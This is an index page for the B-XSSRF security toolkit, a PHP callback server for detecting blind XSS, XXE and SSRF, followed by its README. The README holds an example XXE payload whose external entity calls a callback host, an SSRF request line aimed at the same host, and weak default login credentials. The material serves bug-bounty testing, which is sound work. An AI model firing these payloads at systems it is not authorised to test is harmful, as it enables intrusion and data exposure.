Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/SpiderMate/B-XSSRF
Toolkit to detect and keep track on Blind XSS, XXE & SSRF
https://github.com/SpiderMate/B-XSSRF
Last synced: 7 days ago
JSON representation
Toolkit to detect and keep track on Blind XSS, XXE & SSRF
- Host: GitHub
- URL: https://github.com/SpiderMate/B-XSSRF
- Owner: SpiderMate
- Created: 2019-08-23T05:23:42.000Z (almost 5 years ago)
- Default Branch: master
- Last Pushed: 2019-08-23T10:50:05.000Z (almost 5 years ago)
- Last Synced: 2024-02-27T23:35:16.715Z (4 months ago)
- Language: PHP
- Homepage:
- Size: 194 KB
- Stars: 296
- Watchers: 6
- Forks: 78
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Lists
- awesome-hacking-lists - B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF (PHP (184))
- awesome-bugbounty-tools - B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF (Exploitation / XXE Injection)
- awesome-bugbounty-tools - B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF (Exploitation / XXE Injection)
- awesome-hacking-lists - SpiderMate/B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF (PHP)
- awesome-hacking-lists - B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF (PHP)
- awesome-bugbounty-tools - B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF (Exploitation / XXE Injection)
README
B-XSSRF
Toolkit to detect and keep track on Blind XSS, XXE & SSRF
### SETUP
- Upload the files to your server.
- Create a Database and upload database.sql file to it.
- Change the DB Credentials in db.php file.
- Ready.
### USAGE
BLIND XSS
```
```
BLIND XXE
```
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
```
SSRF
```
GET /testssrf.php=http://mysite.com/bxssrf/request.php
```
### DEFAULT CREDENTIALS
```
USER : [email protected]
PASS : 123456
```